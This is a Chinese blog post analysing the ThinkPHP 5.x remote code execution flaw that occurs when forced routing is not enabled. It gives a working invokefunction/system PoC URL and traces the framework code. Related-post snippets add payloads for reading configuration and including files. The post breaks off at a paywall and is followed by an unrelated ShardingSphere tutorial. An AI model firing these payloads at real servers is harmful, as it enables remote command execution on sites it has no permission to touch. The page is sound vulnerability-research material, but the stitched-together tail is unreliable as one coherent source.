Thinkphp 5.x 未开启强制路由导致RCE分析

原创 已于 2022-03-31 17:34:52 修改 · 2.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #php

于 2022-03-31 17:19:35 首次发布
本文详细介绍了ThinkPHP5在特定版本中存在的远程命令执行漏洞,该漏洞源于框架对控制器名的校验不足。在兼容模式下,攻击者可利用此漏洞通过指定参数调用任意控制器操作,实现远程代码执行。影响版本包括5.0.7到5.0.22及5.1.x。复现环境为thinkphp5.0.20+php5.6.27+apache+phpstorm。漏洞利用涉及路由解析、模块、控制器和操作的分配,最终导致invokeFunction方法被恶意调用,执行用户提供的系统命令。

这种类型的漏洞是因为框架对于控制器名没有进行足够的校验,在没有开启强制路由的情况下,攻击者可以通过兼容模式调用任意的控制器的操作,从而达到远程命令执行。

1. 影响版本

5.0.7<=thinkphp<=5.0.22
5.1.x

2. 漏洞复现

环境

thinkphp5.0.20+php5.6.27+apache+phpstorm

POC

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-V1MdFF0z-1648718151043)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331163142899.png)]

参数解释

s=index/\think\app/invokefunction,在兼容模式即未开启强制路由情况下,框架可以通过s参数获取pathinfo信息,然后进行路由的解析与调度。这里我们调用的是index模块下的app控制器的invokefunction方法

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TzDGJ7Ia-1648718151044)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331163418444.png)]

function=call_user_func_array,invokefunction方法的第一个参数

vars[0]=system&vars[1][]=whoami,invokefunction方法的第二个参数

3. 漏洞分析

从入口文件开始看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Bh8zsTw7-1648718151044)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331164035344.png)]

加载一些框架文件后,进入run函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dciY41Nq-1648718151044)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331164109925.png)]

首先实例化一个requests对象

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-neBPB96q-1648718151045)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331164157869.png)]

往下一直走,开始进行路由的检测与解析,前面文章已经讲过路由解析的步骤,这里直接看结果

这里的路由解析就是根据pathinfo中的/来拆分出模块,控制器,操作的。我们上面也说过如果开启的强制路由,这个漏洞就失效了,这是因为如果开启了强制路由,我们还想调用invokefunction函数就得这么写:/public/index.php/index/think\app/invokefunction/function/call_user_func_array/vars[0]/phpinfo/vars[1][]/1,但是由于在pathinfo模式下,$_SERVER['PATH_INFO']会自动将URL中的“\”替换为“/”,导致破坏掉payload格式无法正常路由解析,所以必须是兼容模式。
参考:https://paper.seebug.org/888/#poc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BF6JwDbM-1648718151045)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331164314909.png)]

拿到路由调度信息后,我们继续往下走,到139行进入exec函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lQlKO6pF-1648718151045)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331165429745.png)]

因为type=module,进入红框分支

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ip9Kr46j-1648718151046)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220331165554447.png)]

跟进module函数

public static function module($result, $config, $convert = null)
    {
   
   
        if (is_string($result)) {
   
   
            $result = explode('/', $result);
        }

        $request = Request::instance();

        if ($config['app_multi_module']) {
   
   
            // 多模块部署
            $module    = strip_tags(strtolower($result[0] ?: $config['default_module']));
            $bind      = Route::getBind('module');
            $available = false;

            if ($bind)
最低0.47元/天 解锁文章
[漏洞复现]ThinkPHP 5.0.x 开启强制路由导致RCE
wwxxee
05-20 895
ThinkPHP 5.0.x 开启强制路由导致RCE 影响版本: ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1.0-5.1.30 环境: vulhub-master/thinkphp/5-rce 启动docker环境之后访问: 这个的版本是ThinkPHP 5.0.20版本: http://ip:8080/ POC: http://192.168.17.134:8080/index.php?s=/Index/\think\app/invokefunction&func
Thinkphp5开启强制路由导致RCE 漏洞复现与分析
xiaolong22333的博客
09-28 1160
影响版本 小于5.0.23 小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&
ThinkPHP 5.x RCE 漏洞分析与利用总结
dengzhasong7076的博客
01-21 5155
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。 例如: 1、大部分payload进入最后rce的函数是调用了call_user_func,其...
thinkphp5 开启强制路由RCE
fmyyy1的博客
07-28 613
演示版本5.0.15 最终是利用反射调用函数执进行RCE application/config.php强制路由默认为false 从payload来看 ?s=index/\think\app/![invokefunction](https://img-blog.csdnimg.cn/d8840390e06843daa80de48c6c20195c.png) &function=call_user_func_array&vars[0]=system&vars[1][]=whoami
ThinkPHP5.x开启强制路由(s参数)RCE
weixin_43610673的博客
01-14 1332
官方公告:https://blog.thinkphp.cn/869075由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。
ThinkPHP5代码审计【开启强制路由导致RCE
D.MIND 的博客
05-13 2349
文章目录简介环境搭建分析payload修复 简介 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 环境搭建 以5.1.29作为演示: composer create-project --prefer-dist topthink/think=5.1
ThinkPHP开启强制路由导致RCE
11-21 636
开启强制路由导致RCE 对TP5.0.5RCE分析 ThinkPHP5.0.5 payload/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 开启强制路由,并开启兼容模式 漏洞分析 先进入App::run方法,然后前面那些获取默认语言啥的代码不用管,再获取$dispatch变量,此变量为空进而调用rout
thinkphp5.0.x RCE
fmyyy1的博客
07-28 672
ThinkPHP 5.0.x (<=5.0.23) 5.0.23->5.0.24 对method方法添加了过滤,该方法为获取请求类型,5.0.24中只允许method为常用的几个方法,否则就将其置为POST方法。 在/thinkphp/library/think/Request.php下的filterValue函数下的第五行,调用了call_user_func()方法 private function filterValue(&$value, $key, $filters)
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6533
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
热门推荐
qq_67473072的博客
07-13 1万+
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
Thinkphp 5.x 笔记
叱咤少帅的博客
09-30 296
(1)返回JSON public function xx(){ $data = array("name"=>"knight","city"=>"cs"); return json_encode($data); }
Thinkphp5x远程执行命令及getshell
2201_75891821的博客
08-07 944
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
ThinkPHP5.X快速入门
Delong
04-04 557
ThinkPHP5.X快速入门thinkPHP5.0 路由 前后端分离 绑定模块 隐藏入口文件1.前后端分离2.绑定模块3.隐藏入口文件 thinkPHP5.0 路由 前后端分离 绑定模块 隐藏入口文件 1.前后端分离 在网站public目录下新建admin.php 打开admin.php <?php // [ 应用入口文件 ] /...
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 531
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1435
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
【攻防世界】php_rceThinkPHP5
2302_79800344的博客
04-09 1087
【代码】【攻防世界】php_rceThinkPHP5漏洞)
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6914
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
thinkphp5框架漏洞
m0_74196038的博客
03-07 1862
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的这个poc是通过post方法提交的,然后url当中还是要提交?s=captcha特殊url编码之后的POC。
攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞
hxhxhxhxx的博客
07-15 575
攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞题目解法 题目 首先我们是命令执行rce,那么我们一般优先访问index.php 然后进行代码审计(这里为了方便,搬运简书大佬的复现和审计) 简书大佬的复现 解法 因为要将我们输入的东西实例化(thinkphp他是这么叫的) ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find
shardingsphere 强制路由
最新发布
04-15
### ShardingSphere 强制路由的功能概述 ShardingSphere 提供了 **强制路由 (Hint Routing)** 功能,用于在运行时动态覆盖已有的分片规则。此功能适用于需要临时跳过分片策略并直接访问目标数据库或表的场景[^1]。 --- ### 配置与实现方法 #### 1. 引入依赖 为了使用 ShardingSphere 的强制路由功能,需确保项目中引入了 `shardingsphere-jdbc-core` 或其他相关模块的 Maven/Gradle 依赖: ```xml <!-- Maven --> <dependency> <groupId>org.apache.shardingsphere</groupId> <artifactId>shardingsphere-jdbc-core</artifactId> <version>{latest-version}</version> </dependency> ``` 或者 Gradle: ```gradle implementation 'org.apache.shardingsphere:shardingsphere-jdbc-core:{latest-version}' ``` 其中 `{latest-version}` 是最新的版本号,请根据实际需求替换。 --- #### 2. 数据源与规则配置 在配置文件中定义分片规则的同时,无需额外设置强制路由相关内容。以下是 YAML 格式的示例配置: ```yaml dataSources: ds_0: url: jdbc:mysql://localhost:3306/db0?serverTimezone=UTC&useSSL=false username: root password: root ds_1: url: jdbc:mysql://localhost:3306/db1?serverTimezone=UTC&useSSL=false username: root password: root rules: - !SHARDING tables: t_order: actualDataNodes: ds_${0..1}.t_order_${0..1} tableStrategy: standard: shardingColumn: order_id shardingAlgorithmName: t_order_inline keyGenerateStrategy: column: order_id keyGeneratorName: snowflake shardingAlgorithms: t_order_inline: type: INLINE props: algorithm-expression: t_order_${order_id % 2} props: sql-show: true ``` 上述配置中,`actualDataNodes` 定义了分片的实际节点分布,而 `tableStrategy` 则指定了默认的分片算法[^2]。 --- #### 3. 使用 Hint API 实现强制路由 通过 ShardingSphere 提供的 Hint API,在代码层面可以显式指定数据操作的目标库或表。以下是一个完整的 Java 示例: ```java import org.apache.shardingsphere.api.hint.HintManager; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; public class HintRoutingExample { public static void main(String[] args) throws Exception { // 获取连接对象(此处省略获取 Connection 的具体过程) try (Connection connection = dataSource.getConnection()) { // 创建 HintManager 并开启强制路由模式 try (HintManager hintManager = HintManager.getInstance()) { hintManager.addDatabaseShardingValue("t_order", "ds_0"); // 指定数据库为 ds_0 hintManager.addTableShardingValue("t_order", 0); // 指定表为 t_order_0 String querySql = "SELECT * FROM t_order WHERE order_id = ?"; try (PreparedStatement preparedStatement = connection.prepareStatement(querySql)) { preparedStatement.setInt(1, 1); ResultSet resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { System.out.println(resultSet.getInt("order_id")); } } } } } } ``` 在此代码片段中: - `addDatabaseShardingValue` 方法用于指定目标数据库。 - `addTableShardingValue` 方法则进一步细化到具体的表级别[^1]。 --- #### 4. SQL 注解方式支持 除了程序化调用外,还可以利用 SQL 注解的方式完成强制路由。例如: ```sql /*+ SHARDING_HINT(ds_name='ds_0', tbl_name='t_order_0') */ SELECT * FROM t_order WHERE order_id = 1; ``` 这种方式适合于简单的查询场景,但在复杂业务逻辑下推荐优先采用 Hint API 方式[^2]。 --- ### 注意事项 - 强制路由会完全忽略现有的分片规则,因此应谨慎使用以避免性能问题或其他意外行为。 - 如果频繁使用强制路由,则可能表明当前分片设计存在不足之处,建议重新评估分片策略。 --- 问题
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值